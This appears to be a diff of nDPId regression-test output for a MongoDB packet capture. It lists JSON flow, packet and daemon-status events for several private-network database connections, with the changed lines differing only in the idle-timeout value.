+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483459978959,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483459978959,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} 
+00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":6,"total-skipped-flows":0,"total-l4-data-len":247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1483558834969} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":12,"total-skipped-flows":0,"total-l4-data-len":306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1483726705497} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-data-len":364,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1483737232974} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":633,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1483814916005} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 